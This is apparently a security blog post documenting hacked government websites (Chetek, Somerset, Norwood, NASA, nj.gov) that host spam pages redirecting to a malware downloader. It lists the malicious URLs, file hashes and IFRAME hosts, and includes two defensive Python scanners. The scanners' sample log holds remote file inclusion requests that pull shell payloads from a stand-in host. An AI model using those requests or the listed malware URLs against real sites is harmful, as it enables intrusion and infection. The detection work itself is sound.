![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia0AiHLm2f7yt_yEvBrGRTlRBTj6eg1LHKcCtTa43tNcHs-8zmhUC-SmwzarcOxoOzN8tnqIsEEEVTpBbW1gHp71r7gACX9w6R4yBez5VwQh1PMbneV0QwtJORQ6RS8pdMX3sF9A/s200/chetek.jpg)
Apparently, malicious parties managed to compromise the City of Chetek's official site and created several subdomains hosting spam URLs that redirect to the downloader's page:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpL__KLWj-xBBVRINTk-v4coCu98tt4RmnweibFLAbQnBIGCdgUf0BZTZL1IkxPx38QHl5MHp1hd4q0N3FJ3z6v1HOnLIEdp64tNM5dWbicYbgaF2nLPjEF7YLfJMLvlFSe-IUhQ/s200/chetek_redirector.jpg)
st-3.x.cityofchetek-wi.gov/porn/st3/537.html
st-2.x.cityofchetek-wi.gov/porn/st2/322.html
2k.x.cityofchetek-wi.gov/porn/2k-003/1618.html
st-2.x.cityofchetek-wi.gov/porn/st2/409.html
All of the above redirect to the downloader at freeclipoftheday.com/movie1.php?id=4154&n=teens&border=FFFFFF&bgcolor=000000
Detection rate: 9/32 (28.13%)
File size: 75771 bytes
MD5: a74b09c7e6ca828ec0382c4f4f234bac
SHA1: 2861a4215dd2a579afe1e30372e05d2ea00223f2
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjByKAYgFUFkX-e36tOfqoR7FbulKM0QivoMG9yPSCSaDepCsT317DdfTzrkU7XYL5WQkT1C6YV7t9Rdzplq5xVtDScFZ76cfMV4jl9tkmcELrSvd7toH-XOLzcSWP7mT_EqJQ-Hw/s200/blackhat_SEO.jpg)
The same subdomain and /porn/ path pattern shows up on somersettx.gov:
2k.x.somersettx.gov/porn/2k-004/156.html
2k.x.somersettx.gov/porn/2k-004/313.html
2k.x.somersettx.gov/porn/2k-004/829.html
2k.x.somersettx.gov/porn/2k-004/830.html
st-5.x.somersettx.gov/porn/st5/103.html
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHvxgTIzljOpT36V5QFAyq6E3gJSS_tdw-mCAr8mlo9YH_l52dwZih8foAAsp65vbOVjNUzdBfuEtW_8Gm9AJYavxs1lQoDTYgdqbB4hoVvqJ4HnJcaJmczKMVfGY6VrS9grZYg/s200/nasa_pharma_redirector.jpg)
norwood-ma.gov, meanwhile, serves pharmaceutical spam pages out of hidden .dir directories:
sql.norwood-ma.gov/libraries/transformations/.dir/132/valium-cost.html
ldap.norwood-ma.gov/htdocs/js/.dir/12/valium-online-order.html
Several more high-profile sites hosting such scams that I came across yesterday are NASA's WorldWind issue tracker and the State of New Jersey, which has historically hosted such pages:
issues.worldwind.arc.nasa.gov/secure/attachment/10781/Buy-Valium.html
issues.worldwind.arc.nasa.gov/secure/attachment/10800/Valium.html
issues.worldwind.arc.nasa.gov/secure/attachment/10791/Panasonic-Ringtone.html
nj.gov/education/voc/9/2007/
nj.gov/education/voc/9/2007/viagra/viagra-online.html
nj.gov/education/voc/9/2007/zoloft/buy-zoloft-online.html
nj.gov/education/voc/9/2007/tramadol/discount-tramadol.html
Moreover, during the last week another batch of sites was reported serving malware, spam and blackhat SEO pages:
Just yesterday, for instance, F-Secure discovered a phishing page hosted on the site of India's Police Academy, and Sunbelt pointed out that Beer.ch had been IFRAME-ed with the following URLs, belonging to the Russian Business Network, which also IFRAME-ed Bank of India once:
81.95.149.74/1/index.php
81.95.149.74/22/index.php
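Checking a page for the kind of injected IFRAME described above is quick to automate. The script below is an added example, not code from the original post or from Sunbelt: it parses HTML and flags IFRAMEs that point off-site, at a bare IP literal, or are sized or styled to be invisible. The sample page is constructed (only the two 81.95.149.74 URLs are the ones listed above), and the site host name beer.ch is assumed for the "off-site" check.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import ipaddress


class _IframeCollector(HTMLParser):
    """Collect every <iframe> start tag and its attributes."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for width/height values that render nothing visible (0, 1 or 2 px)."""
    v = value.strip().lower().rstrip("px")
    try:
        return int(v) <= 2
    except ValueError:
        return False


def find_injected_iframes(html, site_host):
    """Return (src, reasons) for every iframe that looks injected rather than legitimate.

    Heuristics: src host is off-site, is an IP literal, or the frame is sized/styled to be invisible.
    """
    parser = _IframeCollector()
    parser.feed(html)
    findings = []
    for tag in parser.iframes:
        src = tag.get("src", "")
        host = urlparse(src).hostname or ""
        reasons = []
        if host and host != site_host and not host.endswith("." + site_host):
            reasons.append("off-site")
        try:
            ipaddress.ip_address(host)
            reasons.append("ip-literal host")
        except ValueError:
            pass  # not an IP literal (or no host at all)
        if _is_tiny(tag.get("width", "")) or _is_tiny(tag.get("height", "")):
            reasons.append("zero-size")
        style = tag.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by style")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample: a legitimate same-site banner frame plus two injected ones.
SAMPLE_PAGE = """<html><body>
<h1>Beer directory</h1>
<iframe src="http://www.beer.ch/banner.html" width="468" height="60"></iframe>
<iframe src="http://81.95.149.74/1/index.php" width="0" height="0" style="visibility: hidden"></iframe>
<iframe src="http://81.95.149.74/22/index.php" width=1 height=1></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_injected_iframes(SAMPLE_PAGE, "beer.ch"):
        print(src, "->", ", ".join(reasons))
```

Running it against a live copy of your own pages (fetch, then feed the body to `find_injected_iframes`) catches the usual 0x0 or `visibility:hidden` frame that an attacker appends to a template; the same checks apply to `<script src=...>` tags with minor changes.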
How is all this happening? Both in an automated and, sometimes, in a targeted way, where automated stands for remote file inclusion attacks carried out through botnets.
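Remote file inclusion attempts leave an obvious trace in web server logs: a query parameter whose value is itself a URL, usually ending in `?` so the target script's appended suffix is ignored. The script below is an added example, not from the original post: it scans Apache combined-format log lines for that signature and lists the hosts serving the payloads. The log lines are constructed (documentation IP ranges, made-up paths) and are not from any of the sites named above.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed sample lines in Apache "combined" format; not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2007:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Sep/2007:10:01:07 +0000] "GET /index.php?page=http://203.0.113.9/shell.txt? HTTP/1.1" 200 1834 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/Sep/2007:10:01:08 +0000] "GET /modules/forum/view.php?dir=http%3A%2F%2F203.0.113.9%2Fid.txt%3F HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
10.0.0.7 - - [12/Sep/2007:10:02:00 +0000] "GET /search.php?q=http%20headers HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.44 - - [12/Sep/2007:10:02:31 +0000] "GET /admin/index.php?cfg[path]=ftp://203.0.113.9/c.txt HTTP/1.1" 200 4012 "-" "Mozilla/4.0"
"""

# Combined format: client IP, identd, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is the RFI signature: PHP's include() with
# allow_url_include / allow_url_fopen enabled fetches and executes it as code.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftps?)://(?P<host>[^/?#:]+)', re.IGNORECASE)


def find_rfi_attempts(lines):
    """Return one record per query parameter whose value points at a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable combined-format line
        query = urlparse(m.group("target")).query
        # parse_qsl percent-decodes, so an encoded 'http%3A%2F%2F' is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            u = REMOTE_URL_RE.match(value)
            if not u:
                continue  # plain text containing 'http' without '://' is not flagged
            findings.append({
                "client": m.group("ip"),
                "timestamp": m.group("ts"),
                "status": int(m.group("status")),
                "param": name,
                "remote": value,
                "remote_host": u.group("host"),
                # A trailing '?' (or a NUL) makes whatever the script appends, e.g. '.php',
                # part of the query string, a strong sign the request was crafted.
                "terminator": value.endswith("?") or "\x00" in value,
            })
    return findings


def rfi_source_hosts(findings):
    """Hosts that served the remote payloads: candidates for blocking and reporting."""
    return sorted({f["remote_host"] for f in findings})


if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG.splitlines())
    for h in hits:
        flag = "check the box" if h["status"] == 200 else "failed"
        print(f'{h["timestamp"]} {h["client"]} {h["param"]} -> {h["remote"]} [{flag}]')
    print("payload hosts:", rfi_source_hosts(hits))
```

A 200 response to one of these requests does not prove the include ran, but it is where to start an investigation: pull the referenced .txt, look for new files under the web root with a matching timestamp, and check whether `allow_url_include` is on.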
I sure know all the pharmaceutical blockbusters now.
Related posts:
Bank of India Serving Malware
U.S Consulate in St.Petersburg Serving Malware
Syrian Embassy in London Serving Malware
CISRT Serving Malware